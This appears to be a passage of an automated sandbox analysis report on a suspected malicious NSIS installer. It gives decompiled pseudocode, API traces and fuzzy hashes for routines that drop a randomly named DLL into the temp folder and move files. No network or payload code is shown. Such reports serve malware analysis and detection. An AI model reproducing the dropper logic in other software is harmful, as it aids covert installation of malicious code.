                                                                    • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 32%
                                                                    			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\hardz\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














                                                                    0x004026fb
                                                                    0x00402707
                                                                    0x0040270a
                                                                    0x00402711
                                                                    0x00402712
                                                                    0x00402737
                                                                    0x0040273c
                                                                    0x00402714
                                                                    0x00402719
                                                                    0x0040271a
                                                                    0x0040271a
                                                                    0x00402742
                                                                    0x0040274f
                                                                    0x00402757
                                                                    0x0040275a
                                                                    0x00402760
                                                                    0x0040276e
                                                                    0x00402773
                                                                    0x00402777
                                                                    0x0040277a
                                                                    0x00402783
                                                                    0x0040278f
                                                                    0x00402793
                                                                    0x00402796
                                                                    0x00402798
                                                                    0x0040279b
                                                                    0x0040279c
                                                                    0x0040279d
                                                                    0x004027a0
                                                                    0x004027bf
                                                                    0x004027ac
                                                                    0x004027b4
                                                                    0x004027b7
                                                                    0x004027bc
                                                                    0x004027bc
                                                                    0x004027c6
                                                                    0x004027c6
                                                                    0x004027d8
                                                                    0x004027df
                                                                    0x004027e5
                                                                    0x004027e6
                                                                    0x004027e7
                                                                    0x004027ea
                                                                    0x004027f1
                                                                    0x004027f1
                                                                    0x004027f7
                                                                    0x004027fd
                                                                    0x004027fd
                                                                    0x00402807
                                                                    0x00402808
                                                                    0x0040280c
                                                                    0x0040280e
                                                                    0x00402814
                                                                    0x00402814
                                                                    0x0040281b
                                                                    0x004021e8
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                    • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                    • GlobalFree.KERNEL32 ref: 004027C6
                                                                    • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                    • GlobalFree.KERNEL32 ref: 004027DF
                                                                    • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                    • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                      • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                    • API String ID: 3508600917-1659616846
                                                                    • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                    • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                    • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                    • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                    0x00404d68
                                                                    0x00404d74
                                                                    0x00404d77
                                                                    0x00404d7d
                                                                    0x00404d89
                                                                    0x00404d8c
                                                                    0x00404d8f
                                                                    0x00404d95
                                                                    0x00404d95
                                                                    0x00404d9b
                                                                    0x00404da3
                                                                    0x00404da6
                                                                    0x00404dc3
                                                                    0x00404dc7
                                                                    0x00404dd0
                                                                    0x00404dd0
                                                                    0x00404dda
                                                                    0x00404de3
                                                                    0x00404def
                                                                    0x00404df6
                                                                    0x00404dfa
                                                                    0x00404dfd
                                                                    0x00404e10
                                                                    0x00404e1e
                                                                    0x00404e1e
                                                                    0x00404e22
                                                                    0x00404e24
                                                                    0x00404e27
                                                                    0x00000000
                                                                    0x00404e27
                                                                    0x00404da8
                                                                    0x00404db0
                                                                    0x00404db8
                                                                    0x00404dbe
                                                                    0x00000000
                                                                    0x00404dbe
                                                                    0x00404db8
                                                                    0x00404da6
                                                                    0x00404e31

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                    • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                    • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                    • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID: `y
                                                                    • API String ID: 2531174081-1740403070
                                                                    • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                    • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                    • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                    • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                    0x00405bfd
                                                                    0x00405c05
                                                                    0x00405c19
                                                                    0x00405c19
                                                                    0x00405c1f
                                                                    0x00405c2c
                                                                    0x00405c2c
                                                                    0x00405c2d
                                                                    0x00405c2f
                                                                    0x00405c33
                                                                    0x00405c35
                                                                    0x00405c3e
                                                                    0x00405c40
                                                                    0x00405c5a
                                                                    0x00405c62
                                                                    0x00405c62
                                                                    0x00405c67
                                                                    0x00405c69
                                                                    0x00405c6b
                                                                    0x00405c6f
                                                                    0x00405c70
                                                                    0x00405c73
                                                                    0x00405c7b
                                                                    0x00405c7d
                                                                    0x00405c81
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c87
                                                                    0x00405c8c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c8c
                                                                    0x00405c91

                                                                    APIs
                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                    • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                    • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                    • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                    Strings
                                                                    • *?|<>/":, xrefs: 00405C43
                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                    • API String ID: 589700163-489697304
                                                                    • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                    • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                    • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                    • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403E0E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                    0x00403e20
                                                                    0x00403eb4
                                                                    0x00000000
                                                                    0x00403eb4
                                                                    0x00403e31
                                                                    0x00403e35
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e3b
                                                                    0x00403e44
                                                                    0x00403e47
                                                                    0x00403e47
                                                                    0x00403e4d
                                                                    0x00403e53
                                                                    0x00403e53
                                                                    0x00403e5f
                                                                    0x00403e65
                                                                    0x00403e6c
                                                                    0x00403e6f
                                                                    0x00403e72
                                                                    0x00403e74
                                                                    0x00403e74
                                                                    0x00403e7c
                                                                    0x00403e82
                                                                    0x00403e82
                                                                    0x00403e8c
                                                                    0x00403e91
                                                                    0x00403e94
                                                                    0x00403e99
                                                                    0x00403e9c
                                                                    0x00403e9c
                                                                    0x00403eac
                                                                    0x00403eac
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                    • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                    • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                    • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040166B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0040166B() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A9A(0xffffffd0);
				 *(_t35 - 8) = E00402A9A(0xffffffdf);
				E004059BF(0x40a018,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x40a018, 0x40901c);
					lstrcatA(0x40a018,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						E00405707( *(_t35 + 8),  *(_t35 - 8));
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401428();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                                    0x00401674
                                                                    0x00401684
                                                                    0x00401688
                                                                    0x00401690
                                                                    0x004016a7
                                                                    0x004016af
                                                                    0x004016b8
                                                                    0x004016b8
                                                                    0x004016cb
                                                                    0x004016d7
                                                                    0x004026da
                                                                    0x004016ed
                                                                    0x004016f3
                                                                    0x004016f8
                                                                    0x00000000
                                                                    0x004016f8
                                                                    0x004016cd
                                                                    0x004016cd
                                                                    0x004021e8
                                                                    0x004021e8
                                                                    0x004021e8
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                      • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,?,000000DF,000000D0), ref: 00401690
                                                                    • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,?,000000DF,000000D0), ref: 0040169A
                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,?,000000DF,000000D0), ref: 004016AF
                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll,?,000000DF,000000D0), ref: 004016B8
                                                                      • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ), ref: 00405CA2
                                                                      • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                      • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                      • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                      • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                      • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405765
                                                                      • Part of subcall function 00405707: GetShortPathNameA.KERNEL32 ref: 00405782
                                                                      • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                      • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                      • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                      • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                      • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                      • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                      • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                    • MoveFileA.KERNEL32 ref: 004016C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                    • API String ID: 2621199633-1736446979
                                                                    • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                    • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                    • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                    • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404627, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404627(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
